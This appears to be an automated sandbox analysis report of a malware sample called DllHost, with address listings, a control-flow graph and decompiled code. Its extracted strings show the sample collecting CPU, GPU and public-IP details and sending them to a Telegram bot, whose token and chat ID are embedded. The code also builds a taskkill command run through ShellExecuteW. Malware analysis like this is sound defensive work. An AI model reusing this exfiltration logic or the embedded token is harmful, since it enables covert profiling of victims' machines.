                                                                                                                                                              0x7ff7191bf2f4
                                                                                                                                                              0x7ff7191bf2f9
                                                                                                                                                              0x7ff7191bf2fd
                                                                                                                                                              0x7ff7191bf305
                                                                                                                                                              0x7ff7191bf309
                                                                                                                                                              0x7ff7191bf311
                                                                                                                                                              0x7ff7191bf324
                                                                                                                                                              0x7ff7191bf339
                                                                                                                                                              0x7ff7191bf33f
                                                                                                                                                              0x7ff7191bf345
                                                                                                                                                              0x7ff7191bf34d
                                                                                                                                                              0x7ff7191bf360
                                                                                                                                                              0x7ff7191bf375
                                                                                                                                                              0x7ff7191bf37b
                                                                                                                                                              0x7ff7191bf380
                                                                                                                                                              0x7ff7191bf384
                                                                                                                                                              0x7ff7191bf38c
                                                                                                                                                              0x7ff7191bf390
                                                                                                                                                              0x7ff7191bf399
                                                                                                                                                              0x7ff7191bf3ad
                                                                                                                                                              0x7ff7191bf3c2
                                                                                                                                                              0x7ff7191bf3c8
                                                                                                                                                              0x7ff7191bf3cd
                                                                                                                                                              0x7ff7191bf3d2
                                                                                                                                                              0x7ff7191bf3db
                                                                                                                                                              0x7ff7191bf3e0
                                                                                                                                                              0x7ff7191bf3e8
                                                                                                                                                              0x7ff7191bf3fb
                                                                                                                                                              0x7ff7191bf410
                                                                                                                                                              0x7ff7191bf416
                                                                                                                                                              0x7ff7191bf41c
                                                                                                                                                              0x7ff7191bf424
                                                                                                                                                              0x7ff7191bf438
                                                                                                                                                              0x7ff7191bf44d
                                                                                                                                                              0x7ff7191bf453
                                                                                                                                                              0x7ff7191bf458
                                                                                                                                                              0x7ff7191bf45d
                                                                                                                                                              0x7ff7191bf461
                                                                                                                                                              0x7ff7191bf469
                                                                                                                                                              0x7ff7191bf474
                                                                                                                                                              0x7ff7191bf478
                                                                                                                                                              0x7ff7191bf47c
                                                                                                                                                              0x7ff7191bf480
                                                                                                                                                              0x7ff7191bf48b
                                                                                                                                                              0x7ff7191bf48d
                                                                                                                                                              0x7ff7191bf491
                                                                                                                                                              0x7ff7191bf496
                                                                                                                                                              0x7ff7191bf49e
                                                                                                                                                              0x7ff7191bf4b4
                                                                                                                                                              0x7ff7191bf4b8
                                                                                                                                                              0x7ff7191bf4c3
                                                                                                                                                              0x7ff7191bf4c5
                                                                                                                                                              0x7ff7191bf4cc
                                                                                                                                                              0x7ff7191bf4d2
                                                                                                                                                              0x7ff7191bf4d5
                                                                                                                                                              0x7ff7191bf4dd
                                                                                                                                                              0x7ff7191bf4e3
                                                                                                                                                              0x7ff7191bf4eb
                                                                                                                                                              0x7ff7191bf4ef
                                                                                                                                                              0x7ff7191bf4f4
                                                                                                                                                              0x7ff7191bf4f6
                                                                                                                                                              0x7ff7191bf4fe
                                                                                                                                                              0x7ff7191bf507
                                                                                                                                                              0x7ff7191bf50d
                                                                                                                                                              0x7ff7191bf512
                                                                                                                                                              0x7ff7191bf516
                                                                                                                                                              0x7ff7191bf51f
                                                                                                                                                              0x7ff7191bf52c
                                                                                                                                                              0x7ff7191bf53a
                                                                                                                                                              0x7ff7191bf53f
                                                                                                                                                              0x7ff7191bf547
                                                                                                                                                              0x7ff7191bf55a
                                                                                                                                                              0x7ff7191bf56f
                                                                                                                                                              0x7ff7191bf575
                                                                                                                                                              0x7ff7191bf57b
                                                                                                                                                              0x7ff7191bf583
                                                                                                                                                              0x7ff7191bf597
                                                                                                                                                              0x7ff7191bf5ac
                                                                                                                                                              0x7ff7191bf5b2
                                                                                                                                                              0x7ff7191bf5bb
                                                                                                                                                              0x7ff7191bf5c4
                                                                                                                                                              0x7ff7191bf5cd
                                                                                                                                                              0x7ff7191bf5dd
                                                                                                                                                              0x7ff7191bf5f2
                                                                                                                                                              0x7ff7191bf5fb
                                                                                                                                                              0x7ff7191bf601
                                                                                                                                                              0x7ff7191bf609
                                                                                                                                                              0x7ff7191bf61c
                                                                                                                                                              0x7ff7191bf631
                                                                                                                                                              0x7ff7191bf633
                                                                                                                                                              0x7ff7191bf667

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Initialize$ComputerConcurrency::cancel_current_taskCreateInstanceInternetNameOpenSecuritylstrcpy
                                                                                                                                                              • String ID: %0A$&text=$/sendMessage?chat_id=$1327052997$5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4$New User: %ws%sCPU: %s%sGPU: %s%sIP: %s$https://api.ipify.org/$https://api.telegram.org/bot
                                                                                                                                                              • API String ID: 1521715204-179090217
                                                                                                                                                              • Opcode ID: 07d473b703b7f07bc6e1e854a5250281413e12a7ca8f823f6b265ff0de543217
                                                                                                                                                              • Instruction ID: 6178c7981a6b47863deaf2a5c6b27aaa52417a4e3f1caa6e6de0378775436700
                                                                                                                                                              • Opcode Fuzzy Hash: 07d473b703b7f07bc6e1e854a5250281413e12a7ca8f823f6b265ff0de543217
                                                                                                                                                              • Instruction Fuzzy Hash: 4C228362B18A8585FB00AF68E4443ADA3B2FB447B8F904635DA6D03BD9DF79D1C6D310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B4750 Relevance: 35.5, APIs: 14, Strings: 6, Instructions: 487COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 445 7ff7191b4750-7ff7191b4841 call 7ff7191d2cc0 call 7ff7191d4a30 call 7ff7191bb740 call 7ff7191bab00 call 7ff7191b9520 456 7ff7191b4875-7ff7191b4891 445->456 457 7ff7191b4843-7ff7191b4855 445->457 458 7ff7191b48c5-7ff7191b4947 call 7ff7191ba9a0 call 7ff7191bb100 456->458 459 7ff7191b4893-7ff7191b48a5 456->459 460 7ff7191b4870 call 7ff7191d23d0 457->460 461 7ff7191b4857-7ff7191b486a 457->461 483 7ff7191b4965-7ff7191b4982 call 7ff7191bd2d0 call 7ff7191ba730 458->483 484 7ff7191b4949-7ff7191b4952 458->484 462 7ff7191b48c0 call 7ff7191d23d0 459->462 463 7ff7191b48a7-7ff7191b48ba 459->463 460->456 461->460 465 7ff7191b4f1b-7ff7191b4f20 call 7ff7191da5f8 461->465 462->458 463->462 467 7ff7191b4f21-7ff7191b4f26 call 7ff7191da5f8 463->467 465->467 475 7ff7191b4f27-7ff7191b4f2c call 7ff7191da5f8 467->475 480 7ff7191b4f2d-7ff7191b4f32 call 7ff7191da5f8 475->480 488 7ff7191b4f33-7ff7191b4f38 call 7ff7191da5f8 480->488 496 7ff7191b49b0-7ff7191b4a50 call 7ff7191ba9a0 call 7ff7191bab00 * 2 483->496 497 7ff7191b4984-7ff7191b49ab call 7ff7191b2b00 483->497 484->483 490 7ff7191b4954-7ff7191b495f 484->490 495 7ff7191b4f39-7ff7191b4f3e call 7ff7191da5f8 488->495 490->483 503 7ff7191b4f3f-7ff7191b4f44 call 7ff7191da5f8 495->503 511 7ff7191b4a52-7ff7191b4a62 call 7ff7191bc130 496->511 512 7ff7191b4a66-7ff7191b4a72 496->512 497->496 509 7ff7191b4f45-7ff7191b4f4a call 7ff7191da5f8 503->509 511->512 515 7ff7191b4a74-7ff7191b4a7b 512->515 516 7ff7191b4aba-7ff7191b4b10 call 7ff7191bb740 call 7ff7191bab00 512->516 519 7ff7191b4a9f-7ff7191b4aa3 call 7ff7191bc2a0 515->519 520 7ff7191b4a7d-7ff7191b4a9d 515->520 528 7ff7191b4b12-7ff7191b4b24 516->528 529 7ff7191b4b44-7ff7191b4c03 call 7ff7191bab00 call 7ff7191d4a30 MultiByteToWideChar call 7ff7191bb740 call 7ff7191bab00 516->529 522 7ff7191b4aa8-7ff7191b4aae 519->522 520->522 522->516 525 7ff7191b4ab0-7ff7191b4ab8 522->525 525->515 530 7ff7191b4b3f call 7ff7191d23d0 528->530 531 7ff7191b4b26-7ff7191b4b39 528->531 541 7ff7191b4c05-7ff7191b4c17 529->541 542 7ff7191b4c37-7ff7191b4cd2 call 7ff7191d4a30 MultiByteToWideChar call 7ff7191d9a50 SleepEx ShellExecuteW 529->542 530->529 531->475 531->530 544 7ff7191b4c32 call 7ff7191d23d0 541->544 545 7ff7191b4c19-7ff7191b4c2c 541->545 550 7ff7191b4d05-7ff7191b4d1d 542->550 551 7ff7191b4cd4-7ff7191b4ce5 542->551 544->542 545->480 545->544 554 7ff7191b4d1f-7ff7191b4d30 550->554 555 7ff7191b4d50-7ff7191b4d68 550->555 552 7ff7191b4d00 call 7ff7191d23d0 551->552 553 7ff7191b4ce7-7ff7191b4cfa 551->553 552->550 553->488 553->552 557 7ff7191b4d32-7ff7191b4d45 554->557 558 7ff7191b4d4b call 7ff7191d23d0 554->558 559 7ff7191b4da0-7ff7191b4db9 555->559 560 7ff7191b4d6a-7ff7191b4d80 555->560 557->495 557->558 558->555 563 7ff7191b4dbb-7ff7191b4dcc 559->563 564 7ff7191b4dec-7ff7191b4e04 559->564 561 7ff7191b4d82-7ff7191b4d95 560->561 562 7ff7191b4d9b call 7ff7191d23d0 560->562 561->503 561->562 562->559 567 7ff7191b4de7 call 7ff7191d23d0 563->567 568 7ff7191b4dce-7ff7191b4de1 563->568 569 7ff7191b4e06-7ff7191b4e17 564->569 570 7ff7191b4e38-7ff7191b4ea6 call 7ff7191b9470 call 7ff7191d1494 564->570 567->564 568->509 568->567 572 7ff7191b4e32-7ff7191b4e37 call 7ff7191d23d0 569->572 573 7ff7191b4e19-7ff7191b4e2c 569->573 583 7ff7191b4ed4-7ff7191b4f0e call 7ff7191d23b0 570->583 584 7ff7191b4ea8-7ff7191b4eb5 570->584 572->570 573->572 576 7ff7191b4f0f-7ff7191b4f14 call 7ff7191da5f8 573->576 585 7ff7191b4f15-7ff7191b4f1a call 7ff7191da5f8 576->585 586 7ff7191b4ecf call 7ff7191d23d0 584->586 587 7ff7191b4eb7-7ff7191b4eca 584->587 585->465 586->583 587->585 591 7ff7191b4ecc 587->591 591->586
                                                                                                                                                              C-Code - Quality: 26%
                                                                                                                                                              			E00007FF77FF7191B4750(void* __rax, long long __rbx, long long __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* __r15;
				void* _t207;
				signed char _t215;
				void* _t229;
				void* _t233;
				void* _t240;
				signed long long _t309;
				signed long long _t310;
				intOrPtr* _t321;
				char* _t326;
				signed long long _t330;
				char* _t359;
				intOrPtr* _t375;
				intOrPtr* _t379;
				signed long long _t391;
				void* _t427;
				signed long long _t431;
				intOrPtr _t434;
				void* _t442;
				intOrPtr _t447;
				signed long long _t453;
				intOrPtr _t458;
				signed long long _t461;
				signed long long _t464;
				intOrPtr _t467;
				intOrPtr _t470;
				intOrPtr _t473;
				void* _t479;
				char* _t482;
				void* _t484;
				char* _t485;
				void* _t487;
				signed long long _t488;
				void* _t490;
				long long _t494;
				void* _t500;
				void* _t503;
				void* _t506;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t513;
				signed long long _t514;
				void* _t516;

				_t357 = __rbx;
				 *((long long*)(_t487 + 0x10)) = __rbx;
				 *((long long*)(_t487 + 0x18)) = __rsi;
				 *((long long*)(_t487 + 0x20)) = __rdi;
				_t485 = _t487 - 0x1140;
				_t207 = E00007FF77FF7191D2CC0(0x1240, __rax, _t510, _t511);
				_t488 = _t487 - __rax;
				_t309 =  *0x192190a0; // 0x590452ce5669
				_t310 = _t309 ^ _t488;
				 *(_t485 + 0x1130) = _t310;
				_t482 = __rcx;
				 *((long long*)(_t488 + 0x78)) = __rcx;
				r8d = 0x110;
				E00007FF77FF7191D4A30(_t207, 0, _t485 + 0x20, _t427, _t490);
				_t491 = __rcx;
				E00007FF77FF7191BB740(__rbx, _t488 + 0x58, _t427, __rdi, _t485, __rcx);
				r8d = 9;
				E00007FF77FF7191BAB00(_t357, _t310, _t482, _t491, _t516);
				r14d = 0;
				 *(_t488 + 0x38) = _t514;
				 *(_t488 + 0x48) = _t514;
				 *(_t488 + 0x50) = _t514;
				asm("movups xmm0, [eax]");
				asm("movups [esp+0x38], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [esp+0x48], xmm1");
				 *(_t310 + 0x10) = _t514;
				 *((long long*)(_t310 + 0x18)) = 0xf;
				 *_t310 = r14b;
				_t430 =  >=  ?  *(_t488 + 0x38) : _t488 + 0x38;
				E00007FF77FF7191B9520(_t357, _t485 + 0x20,  >=  ?  *(_t488 + 0x38) : _t488 + 0x38); // executed
				 *((long long*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x20)) = 0x191f9bc0;
				 *((intOrPtr*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) - 0xb0;
				_t431 =  *(_t488 + 0x50);
				if (_t431 - 0x10 < 0) goto 0x191b4875;
				if (_t431 + 1 - 0x1000 < 0) goto 0x191b4870;
				if ( *(_t488 + 0x38) -  *((intOrPtr*)( *(_t488 + 0x38) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f1b;
				0x191d23d0();
				 *(_t488 + 0x48) = _t514;
				 *(_t488 + 0x50) = 0xf;
				 *(_t488 + 0x38) = 0;
				_t434 =  *((intOrPtr*)(_t488 + 0x70));
				if (_t434 - 0x10 < 0) goto 0x191b48c5;
				if (_t434 + 1 - 0x1000 < 0) goto 0x191b48c0;
				if ( *((intOrPtr*)(_t488 + 0x58)) -  *((intOrPtr*)( *((intOrPtr*)(_t488 + 0x58)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f21;
				0x191d23d0();
				 *(_t488 + 0x68) = _t514;
				 *((long long*)(_t488 + 0x70)) = 0xf;
				 *((char*)(_t488 + 0x58)) = 0;
				 *((char*)(_t488 + 0x30)) = 0;
				 *(_t485 - 0x40) = _t514;
				 *(_t485 - 0x30) = _t514;
				 *((long long*)(_t485 - 0x28)) = 0xf;
				 *(_t485 - 0x40) = 0;
				r8d = 1;
				E00007FF77FF7191BA9A0(_t485 - 0x40, _t488 + 0x30, _t491);
				_t375 =  *((intOrPtr*)( *((intOrPtr*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x60)) + 8));
				 *((long long*)(_t488 + 0x40)) = _t375;
				_t321 =  *_t375;
				 *((intOrPtr*)(_t321 + 8))();
				E00007FF77FF7191BB100(_t357, _t488 + 0x38, _t482);
				_t215 =  *((long long*)( *((intOrPtr*)( *_t321 + 0x40))))();
				_t379 =  *((intOrPtr*)(_t488 + 0x40));
				if (_t379 == 0) goto 0x191b4965;
				 *((intOrPtr*)( *_t379 + 0x10))();
				if (_t321 == 0) goto 0x191b4965;
				 *((long long*)( *((intOrPtr*)( *_t321))))();
				r8d = _t215 & 0xff;
				E00007FF77FF7191BD2D0(_t357, _t485 + 0x20, _t485 - 0x40, _t482, _t514); // executed
				E00007FF77FF7191BA730(1, _t357, _t485 + 0x30, _t482, _t506, _t484);
				if (_t321 != 0) goto 0x191b49b0;
				_t252 =  !=  ? 2 : 6;
				_t253 = ( !=  ? 2 : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + _t485 + 0x20 + 0x10);
				r8d = 0;
				E00007FF77FF7191B2B00(2, ( !=  ? 2 : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + _t485 + 0x20 + 0x10),  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + _t485 + 0x20 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + _t485 + 0x20);
				 *(_t485 - 0x60) = _t514;
				 *(_t485 - 0x50) = _t514;
				 *((long long*)(_t485 - 0x48)) = 0xf;
				 *(_t485 - 0x60) = 0;
				r8d = 0x10;
				E00007FF77FF7191BA9A0(_t485 - 0x60, "/K taskkill /IM ",  *((intOrPtr*)( *_t321)));
				_t442 =  >=  ?  *(_t485 - 0x40) : _t485 - 0x40;
				_t494 =  *(_t485 - 0x30);
				E00007FF77FF7191BAB00(_t357, _t485 - 0x60, _t482, _t494);
				r8d = 0xb;
				E00007FF77FF7191BAB00(_t357, _t485 - 0x60, _t482, _t494);
				_t478 =  >=  ?  *(_t485 - 0x60) : _t485 - 0x60;
				_t479 = ( >=  ?  *(_t485 - 0x60) : _t485 - 0x60) +  *(_t485 - 0x50);
				_t359 =  >=  ?  *(_t485 - 0x60) : _t485 - 0x60;
				 *(_t485 - 0x80) = _t514;
				 *(_t485 - 0x70) = _t514;
				r8d = 7;
				 *((long long*)(_t485 - 0x68)) = _t494;
				 *(_t485 - 0x80) = r14w;
				if (_t479 - _t359 - 8 < 0) goto 0x191b4a66;
				E00007FF77FF7191BC130(_t485 - 0x80, _t479 - _t359, _t479, _t485, 0x191f9bc0);
				_t391 = _t514;
				 *(_t485 - 0x70) = _t391;
				 *(_t488 + 0x38) = _t485 - 0x80;
				if (_t359 == _t479) goto 0x191b4aba;
				r9d =  *_t359;
				if (_t391 -  *((intOrPtr*)(_t485 - 0x68)) >= 0) goto 0x191b4a9f;
				_t92 = _t391 + 1; // 0x1
				 *(_t485 - 0x70) = _t92;
				_t326 =  >=  ?  *(_t485 - 0x80) : _t485 - 0x80;
				 *((intOrPtr*)(_t326 + _t391 * 2)) = r9w;
				 *(_t326 + 2 + _t391 * 2) = r14w;
				goto 0x191b4aa8;
				E00007FF77FF7191BC2A0(_t485 - 0x80, _t479, _t485, _t513, 0x191f9bc0);
				if (_t359 + 1 == _t479) goto 0x191b4aba;
				goto 0x191b4a74;
				E00007FF77FF7191BB740(_t359 + 1, _t488 + 0x58, _t479 - _t359, _t479, _t485, _t482);
				r8d = 1;
				E00007FF77FF7191BAB00(_t359 + 1, _t326, _t482, _t482);
				 *(_t485 - 0x20) = _t514;
				 *(_t485 - 0x10) = _t514;
				 *(_t485 - 8) = _t514;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x10], xmm1");
				 *(_t326 + 0x10) = _t514;
				 *((long long*)(_t326 + 0x18)) = 0xf;
				 *_t326 = 0;
				_t447 =  *((intOrPtr*)(_t488 + 0x70));
				if (_t447 - 0x10 < 0) goto 0x191b4b44;
				if (_t447 + 1 - 0x1000 < 0) goto 0x191b4b3f;
				if ( *((intOrPtr*)(_t488 + 0x58)) -  *((intOrPtr*)( *((intOrPtr*)(_t488 + 0x58)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f27;
				0x191d23d0();
				 *(_t488 + 0x68) = _t514;
				 *((long long*)(_t488 + 0x70)) = 0xf;
				 *((char*)(_t488 + 0x58)) = 0;
				_t451 =  >=  ?  *(_t485 - 0x40) : _t485 - 0x40;
				_t229 = E00007FF77FF7191BAB00(_t359 + 1, _t485 - 0x20, _t482,  *(_t485 - 0x30));
				r8d = 0x800;
				E00007FF77FF7191D4A30(_t229, 0, _t485 + 0x930,  >=  ?  *(_t485 - 0x40) : _t485 - 0x40,  *(_t485 - 0x30));
				_t500 =  >=  ?  *(_t485 - 0x20) : _t485 - 0x20;
				 *((intOrPtr*)(_t488 + 0x28)) = 0x400;
				_t330 = _t485 + 0x930;
				 *(_t488 + 0x20) = _t330;
				r9d =  *(_t485 - 0x10);
				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				E00007FF77FF7191BB740(_t359 + 1, _t488 + 0x38,  >=  ?  *(_t485 - 0x40) : _t485 - 0x40, _t479, _t485, _t482);
				r8d = 8;
				_t233 = E00007FF77FF7191BAB00(_t359 + 1, _t330, _t482, _t482);
				asm("movups xmm0, [eax]");
				asm("movups [ebp], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x10], xmm1");
				 *(_t330 + 0x10) = _t514;
				 *((long long*)(_t330 + 0x18)) = 0xf;
				 *_t330 = 0;
				_t453 =  *(_t488 + 0x50);
				if (_t453 - 0x10 < 0) goto 0x191b4c37;
				if (_t453 + 1 - 0x1000 < 0) goto 0x191b4c32;
				if ( *(_t488 + 0x38) -  *((intOrPtr*)( *(_t488 + 0x38) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f2d;
				0x191d23d0();
				r8d = 0x800;
				E00007FF77FF7191D4A30(_t233, 0, _t485 + 0x130, _t453 + 0x28, _t482);
				_t503 =  >=  ?  *_t485 : _t485;
				 *((intOrPtr*)(_t488 + 0x28)) = 0x400;
				 *(_t488 + 0x20) = _t485 + 0x130;
				r9d =  *(_t485 + 0x10);
				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				E00007FF77FF7191D9A50(); // executed
				SleepEx(??, ??); // executed
				_t509 =  >=  ?  *(_t485 - 0x80) : _t485 - 0x80;
				 *((intOrPtr*)(_t488 + 0x28)) = r14d;
				 *(_t488 + 0x20) = _t514;
				ShellExecuteW(??, ??, ??, ??, ??, ??); // executed
				_t458 =  *((intOrPtr*)(_t485 + 0x18));
				if (_t458 - 0x10 < 0) goto 0x191b4d05;
				if (_t458 + 1 - 0x1000 < 0) goto 0x191b4d00;
				if ( *_t485 -  *((intOrPtr*)( *_t485 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f33;
				0x191d23d0();
				 *(_t485 + 0x10) = _t514;
				 *((long long*)(_t485 + 0x18)) = 0xf;
				 *_t485 = 0;
				_t461 =  *(_t485 - 8);
				if (_t461 - 0x10 < 0) goto 0x191b4d50;
				if (_t461 + 1 - 0x1000 < 0) goto 0x191b4d4b;
				if ( *(_t485 - 0x20) -  *((intOrPtr*)( *(_t485 - 0x20) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f39;
				0x191d23d0();
				 *(_t485 - 0x10) = _t514;
				 *(_t485 - 8) = 0xf;
				 *(_t485 - 0x20) = 0;
				_t464 =  *((intOrPtr*)(_t485 - 0x68));
				if (_t464 - 8 < 0) goto 0x191b4da0;
				if (2 + _t464 * 2 - 0x1000 < 0) goto 0x191b4d9b;
				if ( *(_t485 - 0x80) -  *((intOrPtr*)( *(_t485 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f3f;
				0x191d23d0();
				 *(_t485 - 0x70) = _t514;
				 *((long long*)(_t485 - 0x68)) = 7;
				 *(_t485 - 0x80) = r14w;
				_t467 =  *((intOrPtr*)(_t485 - 0x48));
				if (_t467 - 0x10 < 0) goto 0x191b4dec;
				if (_t467 + 1 - 0x1000 < 0) goto 0x191b4de7;
				if ( *(_t485 - 0x60) -  *((intOrPtr*)( *(_t485 - 0x60) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f45;
				0x191d23d0();
				 *(_t485 - 0x50) = _t514;
				 *((long long*)(_t485 - 0x48)) = 0xf;
				 *(_t485 - 0x60) = 0;
				_t470 =  *((intOrPtr*)(_t485 - 0x28));
				if (_t470 - 0x10 < 0) goto 0x191b4e38;
				if (_t470 + 1 - 0x1000 < 0) goto 0x191b4e32;
				if ( *(_t485 - 0x40) -  *((intOrPtr*)( *(_t485 - 0x40) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4f0f;
				0x191d23d0();
				 *((long long*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x20)) = 0x191f9bc0;
				 *((intOrPtr*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) - 0xb0;
				E00007FF77FF7191B9470( *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) - 0xb0, _t485 + 0x30);
				 *((long long*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x20)) = 0x191f9798;
				 *((intOrPtr*)(_t485 +  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t485 + 0x20)) + 4)) - 0x18;
				 *((long long*)(_t485 + 0xd0)) = 0x191f9778;
				_t240 = E00007FF77FF7191D1494(_t485 + 0xd0);
				_t473 =  *((intOrPtr*)(_t482 + 0x18));
				if (_t473 - 0x10 < 0) goto 0x191b4ed4;
				if (_t473 + 1 - 0x1000 < 0) goto 0x191b4ecf;
				if ( *_t482 -  *((intOrPtr*)( *_t482 - 8)) - 8 - 0x1f > 0) goto 0x191b4f15;
				0x191d23d0();
				 *(_t482 + 0x10) = _t514;
				 *((long long*)(_t482 + 0x18)) = 0xf;
				 *_t482 = 0;
				return E00007FF77FF7191D23B0(_t240, 0,  *(_t485 + 0x1130) ^ _t488);
			}
















































                                                                                                                                                              0x7ff7191b4750
                                                                                                                                                              0x7ff7191b4750
                                                                                                                                                              0x7ff7191b4755
                                                                                                                                                              0x7ff7191b475a
                                                                                                                                                              0x7ff7191b4764
                                                                                                                                                              0x7ff7191b4771
                                                                                                                                                              0x7ff7191b4776
                                                                                                                                                              0x7ff7191b4779
                                                                                                                                                              0x7ff7191b4780
                                                                                                                                                              0x7ff7191b4783
                                                                                                                                                              0x7ff7191b478a
                                                                                                                                                              0x7ff7191b478d
                                                                                                                                                              0x7ff7191b4794
                                                                                                                                                              0x7ff7191b479e
                                                                                                                                                              0x7ff7191b47a3
                                                                                                                                                              0x7ff7191b47ab
                                                                                                                                                              0x7ff7191b47b1
                                                                                                                                                              0x7ff7191b47c1
                                                                                                                                                              0x7ff7191b47c6
                                                                                                                                                              0x7ff7191b47c9
                                                                                                                                                              0x7ff7191b47ce
                                                                                                                                                              0x7ff7191b47d3
                                                                                                                                                              0x7ff7191b47d8
                                                                                                                                                              0x7ff7191b47db
                                                                                                                                                              0x7ff7191b47e0
                                                                                                                                                              0x7ff7191b47e4
                                                                                                                                                              0x7ff7191b47e9
                                                                                                                                                              0x7ff7191b47ed
                                                                                                                                                              0x7ff7191b47f5
                                                                                                                                                              0x7ff7191b4803
                                                                                                                                                              0x7ff7191b480d
                                                                                                                                                              0x7ff7191b4821
                                                                                                                                                              0x7ff7191b4834
                                                                                                                                                              0x7ff7191b4838
                                                                                                                                                              0x7ff7191b4841
                                                                                                                                                              0x7ff7191b4855
                                                                                                                                                              0x7ff7191b486a
                                                                                                                                                              0x7ff7191b4870
                                                                                                                                                              0x7ff7191b4875
                                                                                                                                                              0x7ff7191b487a
                                                                                                                                                              0x7ff7191b4883
                                                                                                                                                              0x7ff7191b4888
                                                                                                                                                              0x7ff7191b4891
                                                                                                                                                              0x7ff7191b48a5
                                                                                                                                                              0x7ff7191b48ba
                                                                                                                                                              0x7ff7191b48c0
                                                                                                                                                              0x7ff7191b48c5
                                                                                                                                                              0x7ff7191b48ca
                                                                                                                                                              0x7ff7191b48d3
                                                                                                                                                              0x7ff7191b48d8
                                                                                                                                                              0x7ff7191b48dd
                                                                                                                                                              0x7ff7191b48e1
                                                                                                                                                              0x7ff7191b48e5
                                                                                                                                                              0x7ff7191b48ed
                                                                                                                                                              0x7ff7191b48f1
                                                                                                                                                              0x7ff7191b4900
                                                                                                                                                              0x7ff7191b4913
                                                                                                                                                              0x7ff7191b4917
                                                                                                                                                              0x7ff7191b491c
                                                                                                                                                              0x7ff7191b491f
                                                                                                                                                              0x7ff7191b4928
                                                                                                                                                              0x7ff7191b4939
                                                                                                                                                              0x7ff7191b493f
                                                                                                                                                              0x7ff7191b4947
                                                                                                                                                              0x7ff7191b494c
                                                                                                                                                              0x7ff7191b4952
                                                                                                                                                              0x7ff7191b4962
                                                                                                                                                              0x7ff7191b4965
                                                                                                                                                              0x7ff7191b4971
                                                                                                                                                              0x7ff7191b497a
                                                                                                                                                              0x7ff7191b4982
                                                                                                                                                              0x7ff7191b49a2
                                                                                                                                                              0x7ff7191b49a5
                                                                                                                                                              0x7ff7191b49a8
                                                                                                                                                              0x7ff7191b49ab
                                                                                                                                                              0x7ff7191b49b0
                                                                                                                                                              0x7ff7191b49b4
                                                                                                                                                              0x7ff7191b49b8
                                                                                                                                                              0x7ff7191b49c0
                                                                                                                                                              0x7ff7191b49c4
                                                                                                                                                              0x7ff7191b49d5
                                                                                                                                                              0x7ff7191b49e4
                                                                                                                                                              0x7ff7191b49e9
                                                                                                                                                              0x7ff7191b49f1
                                                                                                                                                              0x7ff7191b49f6
                                                                                                                                                              0x7ff7191b4a07
                                                                                                                                                              0x7ff7191b4a15
                                                                                                                                                              0x7ff7191b4a1a
                                                                                                                                                              0x7ff7191b4a27
                                                                                                                                                              0x7ff7191b4a2c
                                                                                                                                                              0x7ff7191b4a33
                                                                                                                                                              0x7ff7191b4a37
                                                                                                                                                              0x7ff7191b4a3d
                                                                                                                                                              0x7ff7191b4a41
                                                                                                                                                              0x7ff7191b4a50
